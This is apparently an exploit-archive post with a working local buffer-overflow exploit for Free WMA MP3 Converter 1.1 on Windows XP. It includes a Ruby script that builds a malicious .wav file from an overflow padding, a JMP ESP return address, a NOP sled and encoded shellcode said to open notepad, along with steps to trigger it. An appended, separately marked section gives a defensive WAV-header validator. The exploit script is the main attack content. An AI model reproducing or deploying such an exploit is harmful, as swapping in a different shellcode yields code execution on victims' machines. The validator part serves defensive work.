Free WMA MP3 Converter version 1.1 local exploit that spawns notepad.exe.
c3b44064422e21ee9687ca1e3c34cc121e7b41eaa69a3a0f69add0c44d00b2e8
Sorry, was missing some text from my previous email.
# Exploit Title: Free WMA MP3 Converter
# Date: 02/04/2010
# Author: Richard Leahy
# Software Link: http://www.freewarefiles.com/downloads_counter.php?programid=44210
# Version: 1.1
# Tested on: Windows XP SP2
# Category: local exploit
To trigger the vulnerability, open up the application, choose wav to mp3, load the specially crafted wav file and click convert. Probably works for all the other options too,
e.g. mp3 to wav etc. Run the code below and pipe it into a .wav file.
#code
#!/usr/bin/env ruby
nop = "\x90"
#imagehlp
jmp_esp = [0x76cafa32].pack('V')
#shellcode opens notepad
shellcode =
"\xd9\xc7\xd9\x74\x24\xf4\xba\xcc\x7a\xcb\xf7\x33\xc9\xb1" +
"\x33\x5e\x83\xee\xfc\x31\x56\x13\x03\x9a\x69\x29\x02\xde" +
"\x66\x24\xed\x1e\x77\x57\x67\xfb\x46\x45\x13\x88\xfb\x59" +
"\x57\xdc\xf7\x12\x35\xf4\x8c\x57\x92\xfb\x25\xdd\xc4\x32" +
"\xb5\xd3\xc8\x98\x75\x75\xb5\xe2\xa9\x55\x84\x2d\xbc\x94" +
"\xc1\x53\x4f\xc4\x9a\x18\xe2\xf9\xaf\x5c\x3f\xfb\x7f\xeb" +
"\x7f\x83\xfa\x2b\x0b\x39\x04\x7b\xa4\x36\x4e\x63\xce\x11" +
"\x6f\x92\x03\x42\x53\xdd\x28\xb1\x27\xdc\xf8\x8b\xc8\xef" +
"\xc4\x40\xf7\xc0\xc8\x99\x3f\xe6\x32\xec\x4b\x15\xce\xf7" +
"\x8f\x64\x14\x7d\x12\xce\xdf\x25\xf6\xef\x0c\xb3\x7d\xe3" +
"\xf9\xb7\xda\xe7\xfc\x14\x51\x13\x74\x9b\xb6\x92\xce\xb8" +
"\x12\xff\x95\xa1\x03\xa5\x78\xdd\x54\x01\x24\x7b\x1e\xa3" +
"\x31\xfd\x7d\xa9\xc4\x8f\xfb\x94\xc7\x8f\x03\xb6\xaf\xbe" +
"\x88\x59\xb7\x3e\x5b\x1e\x47\x75\xc6\x36\xc0\xd0\x92\x0b" +
"\x8d\xe2\x48\x4f\xa8\x60\x79\x2f\x4f\x78\x08\x2a\x0b\x3e" +
"\xe0\x46\x04\xab\x06\xf5\x25\xfe\x69\x96\xad\x64\x06\x09" +
"\x2a\x67\xec"
boom = "\x41" * 4112 + jmp_esp + nop * 10 + shellcode
puts boom
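A structural pre-check for the kind of input described above, as an added example that is not part of the original post: the file the script writes starts with filler bytes rather than a RIFF/WAVE header, so a wrapper or gateway can reject it before any converter parses it. The function and sample names are hypothetical, both samples are constructed (the malformed one is inert filler only), and the check assumes canonical RIFF/WAVE input; it does not replace fixing the converter's own parsing code, which the post does not show.

```ruby
# Added example: structural pre-check for .wav input (hypothetical helper names).
# Assumption: input should be a canonical RIFF/WAVE container.

# Returns [ok, reason]; rejects files whose magic or declared sizes do not
# match the bytes actually present.
def check_wav(data)
  data = data.b
  return [false, "shorter than 12-byte RIFF header"] if data.bytesize < 12
  return [false, "missing RIFF magic"] unless data[0, 4] == "RIFF"
  return [false, "missing WAVE form type"] unless data[8, 4] == "WAVE"
  limit = data[4, 4].unpack1("V") + 8
  return [false, "RIFF size exceeds file length"] if limit > data.bytesize

  seen = []
  pos = 12
  while pos + 8 <= limit
    id = data[pos, 4]
    size = data[pos + 4, 4].unpack1("V")
    body = pos + 8
    return [false, "chunk #{id.inspect} overruns the RIFF body"] if body + size > limit
    return [false, "fmt chunk smaller than 16 bytes"] if id == "fmt " && size < 16
    seen << id
    pos = body + size + (size & 1) # chunks are padded to an even length
  end
  return [false, "no fmt chunk"] unless seen.include?("fmt ")
  return [false, "no data chunk"] unless seen.include?("data")
  [true, "ok"]
end

# Constructed sample: minimal valid PCM WAV (mono, 8 kHz, 16-bit, 4 samples).
def sample_valid_wav
  pcm = [0, 1000, -1000, 0].pack("s<*")
  fmt = [1, 1, 8000, 16000, 2, 16].pack("vvVVvv")
  body = "WAVE".b + "fmt ".b + [fmt.bytesize].pack("V") + fmt +
         "data".b + [pcm.bytesize].pack("V") + pcm
  "RIFF".b + [body.bytesize].pack("V") + body
end

# Constructed sample: inert filler with no RIFF header, the same shape as the
# start of the file the post describes (no return address, no payload).
def sample_filler_file
  ("A" * 4112).b
end

if __FILE__ == $PROGRAM_NAME
  { "valid" => sample_valid_wav, "filler" => sample_filler_file }.each do |name, bytes|
    ok, reason = check_wav(bytes)
    puts "#{name}: #{ok ? 'accept' : 'reject'} (#{reason})"
  end
end
```

A file that passes this check can still carry hostile field values, so the pre-check is a triage filter in front of the converter, not a substitute for bounds checking inside it.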